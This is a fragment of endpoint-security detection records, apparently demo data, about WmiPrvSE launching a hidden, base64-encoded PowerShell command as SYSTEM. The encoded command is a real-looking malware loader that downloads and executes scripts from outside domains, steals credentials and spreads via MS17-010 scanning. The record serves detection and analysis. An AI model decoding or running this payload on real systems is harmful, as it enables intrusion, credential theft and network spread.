              "name": "powershell.exe",
              "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
              "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
              "size": 443392,
              "type_id": 1
            },
            {
              "md5": "d683c112190f4b4c6d477d693ee88e35",
              "name": "WmiPrvSE.exe",
              "path": "C:\\Windows\\System32\\wbem",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
              "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
              "size": 425984,
              "type_id": 1
            }
          ]
        },
        "remediated": false,
        "severity": "medium",
        "silent": false,
        "start_ts": 1647533684,
        "tactics": [
          "TA0002",
          "TA0005"
        ],
        "type": "activity",
        "normalized": {
          "observables": {
            "file": {
              "name": [
                "powershell.exe",
                "wmiprvse.exe"
              ],
              "path": [
                "c:\\windows\\system32\\windowspowershell\\v1.0",
                "c:\\windows\\system32\\wbem"
              ]
            }
          },
          "name": "wmiprvse launched encoded powershell command"
        },
        "demo": true
      }
    },
    {
      "id": 6880683125978957000,
      "timestamp": 1647533684,
      "timestamp_nanoseconds": 810000000,
      "date": "2022-03-17T16:14:44+00:00",
      "event_type": "Threat Detection",
      "event_type_id": 553648222,
      "detection": "WMIPRVSE Launched Encoded Powershell Command",
      "connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
      "group_guids": [
        "3aef61ae-a41f-4a89-a47d-1ce96164eea8"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "f3185c52-4903-41da-a833-04a534460eb3",
        "hostname": "Demo_BP_WMIPRVSE",
        "external_ip": "234.38.52.99",
        "active": true,
        "network_addresses": [
          {
            "ip": "157.184.70.94",
            "mac": "67:71:7f:26:b1:5f"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v1/computers/f3185c52-4903-41da-a833-04a534460eb3",
          "trajectory": "https://api.eu.amp.cisco.com/v1/computers/f3185c52-4903-41da-a833-04a534460eb3/trajectory",
          "group": "https://api.eu.amp.cisco.com/v1/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "tactics": [
        "TA0002",
        "TA0005"
      ],
      "bp_data": {
        "audit": false,
        "details": {
          "actions": [
            {
              "action": "end_process",
              "end_ts": 1602033881808,
              "params": [
                "10724"
              ],
              "start_ts": 1602033881805,
              "status": "success"
            }
          ],
          "eng_epoch": 1,
          "eng_ver": "0.9.0.104",
          "matched_activity": {
            "events": [
              {
                "process:start": {
                  "app": "powershell.exe",
                  "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
                  "args": [
                    "powershell.exe",
                    "-NoP"
                  ],
                  "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==",
                  "parent_app": "WmiPrvSE.exe",
                  "parent_app_path": "C:\\Windows\\System32\\wbem",
                  "parent_pid": 2236,
                  "parent_puid": 132461352663910600,
                  "parent_user": "SYSTEM",
                  "parent_user_sid": "010100000000000512000000",
                  "pid": 10724,
                  "puid": 132465072105597400,
                  "ts": 1602033881727175700,
                  "user": "SYSTEM",
                  "user_sid": "010100000000000512000000"
                }
              }
            ],
            "limited": false,
            "matched": 1
          },
          "schema": "endpoint",
          "schema_epoch": 2,
          "sig_id": 20190517123456,
          "sig_rev": 5
        },
        "detection": "apde:20190517123456",
        "end_ts": 1647533684,
        "engine": "apde",
        "id": "d2616Ab846",
        "name": "WMIPRVSE Launched Encoded Powershell Command",
        "observables": {
          "file": [
            {
              "md5": "a575a7610e5f003cc36df39e07c4ba7d",
              "name": "powershell.exe",
              "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
              "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
              "size": 443392,
              "type_id": 1
            },
            {
              "md5": "d683c112190f4b4c6d477d693ee88e35",
              "name": "WmiPrvSE.exe",
              "path": "C:\\Windows\\System32\\wbem",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
              "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
              "size": 425984,
